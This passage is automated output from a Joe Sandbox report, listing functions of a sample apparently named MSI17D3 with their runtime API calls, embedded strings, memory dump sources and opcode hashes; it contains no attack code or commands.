                                                                                                                                                                                • Instruction Fuzzy Hash: 3CC1B370E042588FDF25DF68CA40FACBBB1BF51304F58809DE899AB286DB349D85DB50
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CC669E
                                                                                                                                                                                  • Part of subcall function 00CBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00CBB8DD
                                                                                                                                                                                  • Part of subcall function 00CBB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00CBB900
                                                                                                                                                                                  • Part of subcall function 00CBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB928
                                                                                                                                                                                  • Part of subcall function 00CBB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB9B7
                                                                                                                                                                                • _Find_elem.LIBCPMT ref: 00CC68D8
                                                                                                                                                                                Strings
                                                                                                                                                                                • 0123456789ABCDEFabcdef-+Xx, xrefs: 00CC6715
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                • API String ID: 3042121994-2799312399
                                                                                                                                                                                • Opcode ID: 0cfabe51a6641a4983860c50a01842826e1308d79282f7780144200834236233
                                                                                                                                                                                • Instruction ID: 2f90c5c3c3926fc0a6b9c1dcf85f84cbcf9e80d6b70dd4e7e369a91c4256f84f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0cfabe51a6641a4983860c50a01842826e1308d79282f7780144200834236233
                                                                                                                                                                                • Instruction Fuzzy Hash: 7FC19130E042588FDF25DF64CA45BBCBBB2BF51304F54809DE899AB282DB348D85DB51
                                                                                                                                                                                APIs
                                                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00CE1AFD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                                                • String ID: pow
                                                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                                                • Opcode ID: 9b3eca963ba67b8a148d5ed9bec9326285791fa491d98788b2bac904b15c5cbc
                                                                                                                                                                                • Instruction ID: a1879d45c453574521b89f748f4cdaa2e191914c3c59de945e7b1f3d36489a48
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b3eca963ba67b8a148d5ed9bec9326285791fa491d98788b2bac904b15c5cbc
                                                                                                                                                                                • Instruction Fuzzy Hash: 12516AB1A092C1DFCB117717C94137E77A4EB40700F384D69E8A6822B8EE35DDA5EA47
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                • API String ID: 3732870572-1956417402
                                                                                                                                                                                • Opcode ID: f0bebe9ea1c30f0bc224aca71f160def5e39823dfa7d54964668b9d6bb31373a
                                                                                                                                                                                • Instruction ID: 2afee61f70679f83e159cb25ab352190fc271d8a0d7e9099a1d055693cc27ddf
                                                                                                                                                                                • Opcode Fuzzy Hash: f0bebe9ea1c30f0bc224aca71f160def5e39823dfa7d54964668b9d6bb31373a
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F51C170B04289AFDF258FA984857BEBBF5AF46350F18445BEEA1D7341C3709A41CB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00CBBF6E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                • API String ID: 118556049-2658103896
                                                                                                                                                                                • Opcode ID: 1fa96d2b6a103b00e3f4a0f7f5e3652d0fa503202ca707c1692c3b0f6352dad9
                                                                                                                                                                                • Instruction ID: b3f5a563843e7868ecbc653ff850c0dcaf4551528f6a71e45165f11559ee2972
                                                                                                                                                                                • Opcode Fuzzy Hash: 1fa96d2b6a103b00e3f4a0f7f5e3652d0fa503202ca707c1692c3b0f6352dad9
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A51C5B5D007489FDB10DFA4C841BEEB7B8FF05304F14426AE945AB281E774EA45CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                • API String ID: 0-3019864461
                                                                                                                                                                                • Opcode ID: db4c4585fe00613e6669fe6ef0ade9fd6f7ac980a90c8f7985553981d36607c4
                                                                                                                                                                                • Instruction ID: 59cf29431796aedee42b469c984e2f5eb49df586569b644e32ed7d380483d35c
                                                                                                                                                                                • Opcode Fuzzy Hash: db4c4585fe00613e6669fe6ef0ade9fd6f7ac980a90c8f7985553981d36607c4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9451C170A14204DBDF14DF68C945BEEB7B5FF84304F14461DE806A7281DBB5A989CBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CCD501
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00CCD573
                                                                                                                                                                                  • Part of subcall function 00CC254E: __EH_prolog3.LIBCMT ref: 00CC2555
                                                                                                                                                                                  • Part of subcall function 00CC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F
                                                                                                                                                                                  • Part of subcall function 00CC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0
                                                                                                                                                                                  • Part of subcall function 00CC2FC8: __EH_prolog3.LIBCMT ref: 00CC2FCF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                                • String ID: %.0Lf
                                                                                                                                                                                • API String ID: 3050236999-1402515088
                                                                                                                                                                                • Opcode ID: 838135bac0405fedf90c3f113e93a4293609cae380f2a2dd770530f93e9fc74f
                                                                                                                                                                                • Instruction ID: b6b2f06cea9223a3084414b09374ccc6dce29d89532963cc0c399289c38fe901
                                                                                                                                                                                • Opcode Fuzzy Hash: 838135bac0405fedf90c3f113e93a4293609cae380f2a2dd770530f93e9fc74f
                                                                                                                                                                                • Instruction Fuzzy Hash: E44159B1E00208ABCF05EFE4C885BED7BB5FF08304F208559E946AB295DB359916DF91
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CCD7A5
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00CCD817
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
                                                                                                                                                                                  • Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                • String ID: %.0Lf
                                                                                                                                                                                • API String ID: 1487807907-1402515088
                                                                                                                                                                                • Opcode ID: 86aa5df50144222f7e45b95c10af61e1d778be2502ed9291d38268d76289bdee
                                                                                                                                                                                • Instruction ID: 5cdcbd18955d1c3feac9e25c234e6e59f84dec5cc834956a48b0df45e9fc5ac9
                                                                                                                                                                                • Opcode Fuzzy Hash: 86aa5df50144222f7e45b95c10af61e1d778be2502ed9291d38268d76289bdee
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F418A71E00208ABCF05EFE0D845AEE7BB5FF08300F204459E946AB295EB35A916DF90
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CD188E
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00CD1900
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
                                                                                                                                                                                  • Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                • String ID: %.0Lf
                                                                                                                                                                                • API String ID: 1487807907-1402515088
                                                                                                                                                                                • Opcode ID: 0fecfefd55418e1d4cf9afdfa8aa8d6dc67c3bb9804bacc7bcb04ab7ecaf6a86
                                                                                                                                                                                • Instruction ID: a841633a4ed76e7063ba0f6b61e3175ea52944e2f45fae3368ed38a237d04bee
                                                                                                                                                                                • Opcode Fuzzy Hash: 0fecfefd55418e1d4cf9afdfa8aa8d6dc67c3bb9804bacc7bcb04ab7ecaf6a86
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C416771E00209ABCF05DFE4DC54AEDBBB5FB08300F20854AE906AB395DB359A15DF91
                                                                                                                                                                                APIs
                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CD607E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                • Opcode ID: e1b68926feef361b66466fd0b301e3b3905623b002b582b32a7450ada91057f2
                                                                                                                                                                                • Instruction ID: a0612dd07518293887acd1f4d97e39bf2742636a90eab8da89625c9114f9b47e
                                                                                                                                                                                • Opcode Fuzzy Hash: e1b68926feef361b66466fd0b301e3b3905623b002b582b32a7450ada91057f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E414871900209EFCF15DF98CC81AEEBBB5FF48304F19815AFA1867252D335AA51DB51
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3___cftoe
                                                                                                                                                                                • String ID: !%x
                                                                                                                                                                                • API String ID: 855520168-1893981228
                                                                                                                                                                                • Opcode ID: d4bf05f8df52fc54a7c85b0ee13281381cf922fef9c377c1736546f8d1a53044
                                                                                                                                                                                • Instruction ID: 827eb126d7f1ad8bdfa6719688ab59d547ce09ab0a509e769ca59612feedd9ca
                                                                                                                                                                                • Opcode Fuzzy Hash: d4bf05f8df52fc54a7c85b0ee13281381cf922fef9c377c1736546f8d1a53044
                                                                                                                                                                                • Instruction Fuzzy Hash: 21314771D01209ABDF04DF94E881BEEB7B6FF08304F20442DF905A7251DB75AA46DBA4
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3___cftoe
                                                                                                                                                                                • String ID: !%x
                                                                                                                                                                                • API String ID: 855520168-1893981228
                                                                                                                                                                                • Opcode ID: 7f5d4dd728eff8d543ed592f115bf16ff6581395e3deb7734c0048320bb1d197
                                                                                                                                                                                • Instruction ID: 44a08248ab5f9e00c45e82fdfee33099be85165c3f26d9684a639b5644c65868
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f5d4dd728eff8d543ed592f115bf16ff6581395e3deb7734c0048320bb1d197
                                                                                                                                                                                • Instruction Fuzzy Hash: 74317C71D15249AFDF00DF94D881BEEBBB5EF05300F14001AF948A7342D7759A46EBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00CB5F86
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,665E9022), ref: 00CB5FF6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConvertFreeLocalString
                                                                                                                                                                                • String ID: Invalid SID
                                                                                                                                                                                • API String ID: 3201929900-130637731
                                                                                                                                                                                • Opcode ID: 71ed5a01aa0a73256a6e627aa46a51405c2aafa0d1036c7b98981a8cbff2b0e7
                                                                                                                                                                                • Instruction ID: 774a1212a5645bf9cade7898060b6260da25bc43dd0a7f7568e5fcd2a210f9ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 71ed5a01aa0a73256a6e627aa46a51405c2aafa0d1036c7b98981a8cbff2b0e7
                                                                                                                                                                                • Instruction Fuzzy Hash: B7218C75A046099BDB14DF98C815BBFBBF8EF44714F100A1DE815A7780D7BA6A04CBD0
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CB909B
                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00CB90FE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                • API String ID: 3988782225-1405518554
                                                                                                                                                                                • Opcode ID: 8ef2e98109272d310d4176029871e82c12f548206c531d39988d0b453758f091
                                                                                                                                                                                • Instruction ID: 5b10fd9a91184df4a47b17e76da9804b310617b1f5618550cdd6ed5482dad2c7
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ef2e98109272d310d4176029871e82c12f548206c531d39988d0b453758f091
                                                                                                                                                                                • Instruction Fuzzy Hash: DB21D270805B84DED721CFA8C904B8BBFF4EF19710F10869DE49997781D3B5A604CBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: H_prolog3_
                                                                                                                                                                                • String ID: false$true
                                                                                                                                                                                • API String ID: 2427045233-2658103896
                                                                                                                                                                                • Opcode ID: 993b45d57090ecf43b7d93a7052c7bb4e3f5a00e932e36b200384256bc28531b
                                                                                                                                                                                • Instruction ID: 91c3e276a1b4eb238aa9215e83cc01dd6841388b53683fcac10a6ae5da49d80b
                                                                                                                                                                                • Opcode Fuzzy Hash: 993b45d57090ecf43b7d93a7052c7bb4e3f5a00e932e36b200384256bc28531b
                                                                                                                                                                                • Instruction Fuzzy Hash: 27119375941744AEC720EFB4D881BCAB7F4AF05300F14C51AE9A5C7392EB70E605DB61
                                                                                                                                                                                APIs
                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00CB4261,00CF4400,000000FF,665E9022,00000000,?,00000000,?,?,?,00CF4400,000000FF,?,00CB3A75,?), ref: 00CB4096
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,40000022,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4154
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,3FFFFFFF,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4177
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CB4217
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Local$AllocFree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2012307162-0
                                                                                                                                                                                • Opcode ID: 9c2ccdc9730f2d057dc6f7cb50691e6640b573b2b74d4ea7c660118b7906a80e
                                                                                                                                                                                • Instruction ID: 1ac58b1901ffe8c208290b375fe4657fe15cea708c6a4154899b3e6dec30e054
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c2ccdc9730f2d057dc6f7cb50691e6640b573b2b74d4ea7c660118b7906a80e
                                                                                                                                                                                • Instruction Fuzzy Hash: 945190B1A042059FDB18DF6CC985AAEBBB5FB48350F14462DE925E7381D731AE40CB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00CB1E01
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00CB1E21
                                                                                                                                                                                • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00CB1EA7
                                                                                                                                                                                • LocalFree.KERNEL32(00000001,665E9022,00000000,00000000,00CF3C40,000000FF,?,00000000), ref: 00CB1F2D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
